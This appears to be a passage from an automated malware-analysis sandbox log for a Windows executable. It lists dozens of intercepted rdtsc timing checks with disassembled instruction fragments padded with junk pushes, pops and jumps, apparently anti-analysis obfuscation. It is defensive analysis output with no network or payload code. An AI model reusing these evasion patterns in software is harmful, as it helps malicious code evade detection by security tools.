Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8C123 second address: A8C129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8C129 second address: A8C131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8C131 second address: A8C136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8BB5E second address: A8BB73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A351h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8E668 second address: A8E66C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8E66C second address: A8E68A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A352h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F0E3850A34Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8E68A second address: A8E68E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8E1D0 second address: A8E1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F0E3850A346h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A8E1DE second address: A8E206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jns 00007F0E38E1CB16h 0x0000000c jmp 00007F0E38E1CB28h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A93AC8 second address: A93AD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F0E3850A346h 0x0000000a jnl 00007F0E3850A346h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A93AD8 second address: A93B0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0E38E1CB22h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A93C7D second address: A93C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A93C86 second address: A93CCA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 je 00007F0E38E1CB31h 0x0000000e jmp 00007F0E38E1CB25h 0x00000013 jc 00007F0E38E1CB16h 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push ecx 0x0000001c pushad 0x0000001d jmp 00007F0E38E1CB25h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A94106 second address: A9410C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9410C second address: A94116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A94116 second address: A9411A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9427A second address: A9427E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A06C00 second address: A06C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A06C04 second address: A06C0A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A06C0A second address: A06C18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F0E3850A346h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A06C18 second address: A06C1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A06C1C second address: A06C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A970BC second address: A970DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F0E38E1CB16h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A970DB second address: A97103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A359h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A97103 second address: A97107 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A97107 second address: A9710B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9710B second address: A97129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E38E1CB1Eh 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A97398 second address: A9739D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A976F5 second address: A976FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0E38E1CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A976FF second address: A97703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A97703 second address: A97709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A97709 second address: A97734 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A358h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0E3850A34Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9D961 second address: A9D965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9D965 second address: A9D990 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F0E3850A361h 0x00000010 jmp 00007F0E3850A359h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9D990 second address: A9D9AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0E38E1CB23h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9D9AA second address: A9D9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0E3850A346h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9D9B8 second address: A9D9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9C7F0 second address: A9C80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0E3850A346h 0x0000000a jno 00007F0E3850A346h 0x00000010 jng 00007F0E3850A346h 0x00000016 popad 0x00000017 jc 00007F0E3850A356h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9C80F second address: A9C821 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB1Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9C821 second address: A9C825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9C825 second address: A9C846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F0E38E1CB16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9C9A9 second address: A9C9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A3FFD0 second address: A40069 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0E38E1CB18h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F0E38E1CB18h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D19C7h] 0x0000002f mov dword ptr [ebp+1247C698h], ebx 0x00000035 jc 00007F0E38E1CB21h 0x0000003b pushad 0x0000003c sub dword ptr [ebp+122D33ABh], eax 0x00000042 movzx esi, bx 0x00000045 popad 0x00000046 mov ebx, dword ptr [ebp+1248A06Ch] 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F0E38E1CB18h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 stc 0x00000067 add eax, ebx 0x00000069 mov ecx, 4B3FDB10h 0x0000006e nop 0x0000006f push eax 0x00000070 push edx 0x00000071 jo 00007F0E38E1CB2Eh 0x00000077 jmp 00007F0E38E1CB28h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A40069 second address: A4008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E3850A34Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A9D66A second address: A9D68B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jnp 00007F0E38E1CB16h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0E38E1CB20h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA35A6 second address: AA35AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA35AC second address: AA35B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA35B0 second address: AA35BD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E3850A346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA35BD second address: AA35C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0E38E1CB16h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA36E3 second address: AA36E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA3D2E second address: AA3D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0E38E1CB16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA3D38 second address: AA3D3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA4A93 second address: AA4AA5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007F0E38E1CB16h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AA4AA5 second address: AA4AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAEFF4 second address: AAF017 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0E38E1CB2Fh 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F0E38E1CB27h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAF017 second address: AAF01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAF01C second address: AAF034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E38E1CB22h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAF034 second address: AAF05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0E3850A34Dh 0x00000010 jmp 00007F0E3850A350h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE2E5 second address: AAE30D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0E38E1CB16h 0x0000000a jmp 00007F0E38E1CB27h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE30D second address: AAE311 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE311 second address: AAE315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE927 second address: AAE945 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A358h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE945 second address: AAE949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE949 second address: AAE978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E3850A34Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F0E3850A35Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AAE978 second address: AAE982 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0E38E1CB1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6384 second address: AB6393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6680 second address: AB6690 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0E38E1CB16h 0x00000008 je 00007F0E38E1CB16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB67EC second address: AB67F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB67F0 second address: AB67F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB67F4 second address: AB67FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB67FA second address: AB6800 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6800 second address: AB6805 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6979 second address: AB697D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB697D second address: AB6989 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jng 00007F0E3850A346h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6989 second address: AB69AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F0E38E1CB16h 0x0000000a jmp 00007F0E38E1CB28h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB69AB second address: AB69AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB69AF second address: AB69C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0E38E1CB22h 0x0000000e jg 00007F0E38E1CB16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB69C5 second address: AB69EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0E3850A358h 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F0E3850A346h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB69EC second address: AB69F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB69F0 second address: AB69FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB69FC second address: AB6A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6A00 second address: AB6A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB6CC9 second address: AB6CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F0E38E1CB1Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB7187 second address: AB719A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 je 00007F0E3850A352h 0x0000000b jg 00007F0E3850A346h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB719A second address: AB71A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71A4 second address: AB71A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71A8 second address: AB71AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71AC second address: AB71B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71B2 second address: AB71E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0E38E1CB27h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F0E38E1CB1Ch 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71E3 second address: AB71E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71E9 second address: AB71ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB71ED second address: AB71F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: AB5E1E second address: AB5E24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A08835 second address: A08849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0E3850A34Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: A08849 second address: A0884F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
